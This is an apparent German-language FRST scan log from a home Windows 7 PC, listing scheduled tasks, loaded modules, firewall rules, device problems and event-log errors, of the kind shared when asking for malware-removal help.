CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {08C28A08-D80B-48C4-AC65-5F4E73DF374E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {303B4F06-9161-4552-AA25-A4E586C0E6EB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {5E07F975-0AF2-41E4-98A3-F7E6C9FC9336} - System32\Tasks\{7813F31F-9D81-44E8-B6BD-98ABBAE7B5BE} => pcalua.exe -a G:\Downloads\CS2_RetNon_Ger_2.exe -d G:\Downloads
Task: {6B7FA10D-E9C0-4F3D-B07E-5D6DD5CD1D63} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {71A96727-8AB5-4B55-B70D-FE0F0C075FB8} - System32\Tasks\{441AE403-F8A7-4F93-8B0F-B3F1A4F75D54} => pcalua.exe -a E:\Setup.exe -d E:\
Task: {7725EF1D-0756-4D0D-84C7-281CF011B880} - System32\Tasks\{DD57B9E7-0B38-450F-9FD1-8EDC27A6B4BF} => pcalua.exe -a G:\Downloads\CS2_RetNon_Ger_3.exe -d G:\Downloads
Task: {77CBD9E7-C979-475F-A624-1A93175E7AEC} - System32\Tasks\{9DA21F79-D68C-4D96-B238-AA5A5467AB99} => C:\Users\Ben\Downloads\USB sound\Vista\Setup.exe [2007-06-21] ()
Task: {7B638AC7-BBB4-4B3A-8DD3-629D008BD1CD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {8BDB1E7F-123A-435D-B18A-03F6370F5DC6} - System32\Tasks\{C7F79A47-BAF5-43D4-B22B-CDE1C0D44458} => pcalua.exe -a N:\Autorun.exe -d N:\
Task: {8E8C7228-9E49-4E85-96C2-F9C647354B08} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {A94497F9-5D27-4ABD-A9FC-39FC9D6358B0} - System32\Tasks\PandaUSBVaccine => C:\Program Files (x86)\Panda USB Vaccine\RunInteractiveWin.exe [2009-09-23] ()
Task: {C61C6295-3FA7-43FE-8A97-A41503664FF1} - System32\Tasks\{76A2D95E-7B3C-41FD-B8E2-209053DBD3C0} => pcalua.exe -a "C:\Users\Ben\Downloads\32507\CM6206最新驱动 1009\USB-106-081014-12.8.2111(Full-LO-01)_1016\Setup.exe" -d "C:\Users\Ben\Downloads\32507\CM6206最新驱动 1009\USB-106-081014-12.8.2111(Full-LO-01)_1016"
Task: {E196A98F-38A4-49E5-958B-6CFEFAFFB8BD} - System32\Tasks\{AE712D40-D949-47B4-8608-487122F4C8DA} => pcalua.exe -a C:\Users\Ben\Downloads\32507\1623\UAExtInstall.exe -d C:\Users\Ben\Downloads\32507\1623
Task: {F71D1A64-746E-4CEE-A905-6036D8B0BCDE} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2015-04-10] (Samsung Electronics.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core.job => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA.job => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-28 22:45 - 2015-07-28 22:45 - 00214528 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2014-02-11 07:08 - 2014-02-11 07:08 - 00817152 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Device.dll
2014-02-11 07:08 - 2014-02-11 07:08 - 03650560 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Platform.dll
2015-07-28 22:45 - 2015-07-28 22:45 - 00127488 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-02-08 21:58 - 2011-05-19 10:58 - 00246784 _____ () C:\Windows\SYSTEM32\APOMgr64.DLL
2011-07-29 01:08 - 2011-07-29 01:08 - 01259376 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
2012-02-20 22:29 - 2012-02-20 22:29 - 00087912 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-02-20 22:28 - 2012-02-20 22:28 - 01242472 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-09-03 16:02 - 2016-03-11 02:56 - 00783360 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-09-03 16:02 - 2015-07-03 18:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-09-03 16:02 - 2015-07-03 18:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-09-03 16:02 - 2015-07-03 18:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-09-03 16:02 - 2016-03-31 22:55 - 02549840 _____ () C:\Program Files (x86)\Steam\video.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-09-03 16:02 - 2016-03-31 22:55 - 00829008 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-03-13 14:29 - 2016-02-18 00:25 - 00281088 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2012-02-08 21:58 - 2011-05-04 17:32 - 00094208 ____N () C:\Program Files (x86)\Creative\THX TruStudio\THXNBSet\de-DE\THXAudNB.resources.dll
2011-07-29 01:09 - 2011-07-29 01:09 - 00096112 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
2011-01-17 17:19 - 2012-03-16 13:44 - 00985088 _____ () C:\Program Files (x86)\OpenOffice.org 3\program\libxml2.dll
2015-09-15 20:53 - 2013-07-24 09:24 - 00137728 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2015-09-15 20:53 - 2014-02-15 11:48 - 00295936 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2015-07-29 16:07 - 2015-04-10 14:33 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-09-03 16:02 - 2016-02-09 03:33 - 48400672 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2016-04-09 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{356960C4-500B-4675-AC52-5EC567DE34DD}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [UDP Query User{36F91D86-EC5E-4DBE-8B88-B1CE12731C68}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [{0E1B7C89-3B91-4CEC-8AF5-6162532341D8}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaW.exe
FirewallRules: [{78D12809-FF2A-4DDA-ACC1-BB2875797533}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaW.exe
FirewallRules: [{1EDE5150-BCA2-4A6B-9189-B2D00ED3DF29}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaWmp.exe
FirewallRules: [{8A77EBE2-DE96-4340-8071-67F7F3E18800}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaWmp.exe
FirewallRules: [{D54DC70A-E7FB-4A0F-B820-218AE77BBB26}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe
FirewallRules: [{B0B13C14-79F5-4B10-9199-C10CB3EA44DF}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe
FirewallRules: [{2F3EF107-2B35-40E2-BEA5-0B63D217242F}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe
FirewallRules: [{D4316832-15E7-4DF7-831A-9FC6A198495E}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe
FirewallRules: [{CA850DC0-E1AB-48CB-952A-F72B138057BD}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\Crysis.exe
FirewallRules: [{47C2174A-59B6-47F9-97EE-3730FEAF2C30}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\Crysis.exe
FirewallRules: [{E6543618-5674-498C-B7E2-8EA1C8508635}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\CrysisDedicatedServer.exe
FirewallRules: [{CADE791C-CB47-41AE-8FBD-03713BD312D6}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\CrysisDedicatedServer.exe
FirewallRules: [TCP Query User{7E460BB6-26AF-455B-A94E-0A8F44717B76}C:\program files (x86)\activision\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\activision\call of duty - world at war\codwaw.exe
FirewallRules: [UDP Query User{1079E0A7-3AF3-42CE-AA6A-7DFF93D94AA3}C:\program files (x86)\activision\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\activision\call of duty - world at war\codwaw.exe
FirewallRules: [{DC316397-F7A0-4AC4-82AB-D6079F0A5283}] => (Allow) LPort=8394
FirewallRules: [{0EAA178A-654B-4B70-BD93-6B1F8BFE1979}] => (Allow) LPort=8394
FirewallRules: [{730F6875-1ACD-475B-8562-52B289B80E5E}] => (Allow) C:\Program Files (x86)\League of Legends\Air\LolClient.exe
FirewallRules: [{0605D376-745B-4914-ABB6-C1134CFDADC7}] => (Allow) C:\Program Files (x86)\League of Legends\Air\LolClient.exe
FirewallRules: [{5D456382-629C-42A8-9A18-65E9A65CF3A6}] => (Allow) C:\Program Files (x86)\League of Legends\Game\League of Legends.exe
FirewallRules: [{B9B5CDE4-1AD0-4C05-A5C6-C07E8C1675F9}] => (Allow) C:\Program Files (x86)\League of Legends\Game\League of Legends.exe
FirewallRules: [{CC9CC49D-934B-42A6-9650-6762C986BF15}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2F2188D2-D2C7-4559-8FCA-714F9C5746B1}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{2A91C63D-DB84-4F17-BEF2-2D85659558D6}] => (Allow) C:\Users\Ben\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{F702D92A-178E-4A75-927B-2C26CBFF4ED2}] => (Allow) C:\Users\Ben\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [TCP Query User{F13405BF-147F-4C5E-B94C-1A490D5074CE}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Block) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [UDP Query User{B486CD33-24A5-4633-AAB2-499E1AB19AA0}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Block) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [TCP Query User{D9939FE3-8B1E-4E7D-8644-AAF5E62DEDC5}C:\program files (x86)\ea sports\fifa 11\game\fifa.exe] => (Allow) C:\program files (x86)\ea sports\fifa 11\game\fifa.exe
FirewallRules: [UDP Query User{13A6BFEA-918C-4ED6-B77A-AF252271D5B6}C:\program files (x86)\ea sports\fifa 11\game\fifa.exe] => (Allow) C:\program files (x86)\ea sports\fifa 11\game\fifa.exe
FirewallRules: [{644C8EA5-96D7-4197-9C40-5BC386020BA2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{9928D1DF-61BB-49B4-9392-C075EEC28365}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4D728EA4-73E2-473D-A9EC-70FCAED77821}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{E9C634F6-DADB-40B9-93B8-892E8FC702B9}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{C001F917-B0DD-45E2-9A94-611CD9C24D5D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{8A89ADEF-649D-49E6-94E6-170293CE530E}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [TCP Query User{E5C8FBFC-8C74-421F-AD18-D769C6626D6F}C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe] => (Allow) C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe
FirewallRules: [UDP Query User{CDE753D0-E7C1-4494-A0AC-19737DFD3937}C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe] => (Allow) C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe
FirewallRules: [{297E7E42-D6CF-4AD3-952F-7005DAC344DB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{B6870EAE-243E-4395-9D12-66FED13A84A4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E3BAC2E3-BC77-4CB6-ABCF-454F84491898}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{80829A3C-B092-4637-8E43-F54A5C065E38}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{97434516-7FA0-429A-8B31-785D0AA4C79E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1869DE39-FDF8-4554-A26C-607A7D80C2BB}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A83DCAB6-A357-42A7-B79F-972533FA6125}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{43679186-01A6-4963-BAB0-3FB0F250603E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{94571175-1E14-44D6-B1D7-EC47F6508AF1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal\hl2.exe
FirewallRules: [{E7E3A141-79E4-4C46-BDC8-EAB0EB9FC0C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal\hl2.exe
FirewallRules: [{34249524-CAB6-4750-B4B8-9EBE36522EFA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe
FirewallRules: [{6B312E69-327A-434F-B6DC-998DF0672BB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe
FirewallRules: [{BE8276C7-55CC-43C1-8A6E-34D4B616AA52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\left 4 dead\left4dead.exe
FirewallRules: [{5EAAD74F-E587-4D09-B1B5-ED660F327CDC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\left 4 dead\left4dead.exe
FirewallRules: [{E5926AF7-D748-43E6-9A44-9A22D250C0F4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Jackbox Party Pack\TJPP.exe
FirewallRules: [{69ABCDE4-09A7-41A7-AE34-C83032BCE96A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Jackbox Party Pack\TJPP.exe
FirewallRules: [TCP Query User{B1213675-00B9-4511-B42C-4FF9CF5AF4A8}C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe] => (Allow) C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [UDP Query User{FEA81054-BBA0-4468-BC76-7D2F6F1AC45D}C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe] => (Allow) C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [TCP Query User{BBC82F50-0C7B-49B5-BEAC-1E23300A8E54}C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe] => (Block) C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [UDP Query User{AD912FB0-C293-41DB-963B-74F1D5D8E70D}C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe] => (Block) C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [{9294F9AA-87DE-4D16-AE90-508E07314375}] => (Allow) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

09-04-2016 15:58:56 Revo Uninstaller's restore point - Pro Evolution Soccer 2011

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: AODDriver4.01
Description: AODDriver4.01
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: AODDriver4.01
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/09/2016 06:34:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2016 04:23:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2016 03:47:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2016 03:21:07 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/03/2016 01:34:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Avira.ServiceHost.exe, Version: 1.1.56.9119, Zeitstempel: 0x56a8ea7a
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.19135, Zeitstempel: 0x56a1c79e
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c52f
ID des fehlerhaften Prozesses: 0x1e6c
Startzeit der fehlerhaften Anwendung: 0xAvira.ServiceHost.exe0
Pfad der fehlerhaften Anwendung: Avira.ServiceHost.exe1
Pfad des fehlerhaften Moduls: Avira.ServiceHost.exe2
Berichtskennung: Avira.ServiceHost.exe3

Error: (03/21/2016 03:20:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Avira.ServiceHost.exe, Version: 1.1.54.24924, Zeitstempel: 0x568bd859
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.19135, Zeitstempel: 0x56a1c79e
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c52f
ID des fehlerhaften Prozesses: 0x680
Startzeit der fehlerhaften Anwendung: 0xAvira.ServiceHost.exe0
Pfad der fehlerhaften Anwendung: Avira.ServiceHost.exe1
Pfad des fehlerhaften Moduls: Avira.ServiceHost.exe2
Berichtskennung: Avira.ServiceHost.exe3

Error: (03/21/2016 03:20:23 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: Avira.ServiceHost.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.OutOfMemoryException
   bei NLog.Targets.FileTarget.SequentialArchive(System.String, System.String)
   bei NLog.Targets.FileTarget.DoAutoArchive(System.String, NLog.LogEventInfo)
   bei NLog.Targets.FileTarget.Write(NLog.LogEventInfo)
   bei NLog.Targets.Target.Write(NLog.Common.AsyncLogEventInfo)
   bei NLog.Targets.Target.WriteAsyncLogEvent(NLog.Common.AsyncLogEventInfo)
   bei NLog.LoggerImpl.WriteToTargetWithFilterChain(NLog.Internal.TargetWithFilterChain, NLog.LogEventInfo, NLog.Common.AsyncContinuation)
   bei NLog.LoggerImpl.Write(System.Type, NLog.Internal.TargetWithFilterChain, NLog.LogEventInfo, NLog.LogFactory)
   bei NLog.Logger.WriteToTargets(NLog.LogEventInfo)
   bei NLog.Logger.Log(NLog.LogEventInfo)
   bei Avira.OE.WinCore.Utility.LoggerFacade.Log(NLog.LogLevel, System.String, System.Object[], System.Exception)
   bei Avira.OE.WinCore.Utility.LoggerFacade.Debug(System.String, System.Object[])
   bei Avira.OE.AvConnector.AvFileMonitor.FileWatcher_Changed(System.Object, System.IO.FileSystemEventArgs)
   bei System.IO.FileSystemWatcher.OnChanged(System.IO.FileSystemEventArgs)
   bei System.IO.FileSystemWatcher.NotifyFileSystemEventArgs(Int32, System.String)
   bei System.IO.FileSystemWatcher.CompletionStatusChanged(UInt32, UInt32, System.Threading.NativeOverlapped*)
   bei System.Threading._IOCompletionCallback.PerformIOCompletionCallback(UInt32, UInt32, System.Threading.NativeOverlapped*)

Error: (03/09/2016 03:06:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: vlc.exe, Version: 2.2.1.0, Zeitstempel: 0x00000004
Name des fehlerhaften Moduls: libqt4_plugin.dll, Version: 2.2.1.0, Zeitstempel: 0x00020002
Ausnahmecode: 0x40000015
Fehleroffset: 0x007ca10a
ID des fehlerhaften Prozesses: 0x1a4c
Startzeit der fehlerhaften Anwendung: 0xvlc.exe0
Pfad der fehlerhaften Anwendung: vlc.exe1
Pfad des fehlerhaften Moduls: vlc.exe2
Berichtskennung: vlc.exe3

Error: (03/07/2016 02:58:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (03/06/2016 09:04:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


Systemfehler:
=============
Error: (04/09/2016 06:49:20 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (04/09/2016 06:47:01 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (04/09/2016 06:33:53 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "AODDriver4.01" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (04/09/2016 06:32:38 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (04/09/2016 06:31:52 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Aufgrund der Inkompatibilität mit diesem System wurde \??\C:\ComboFix\catchme.sys nicht geladen. Wenden Sie sich an den Softwarehersteller, um eine kompatible Version des Treibers zu erhalten.

Error: (04/09/2016 06:29:35 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (04/09/2016 06:21:44 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 06:15:43 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 05:54:43 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
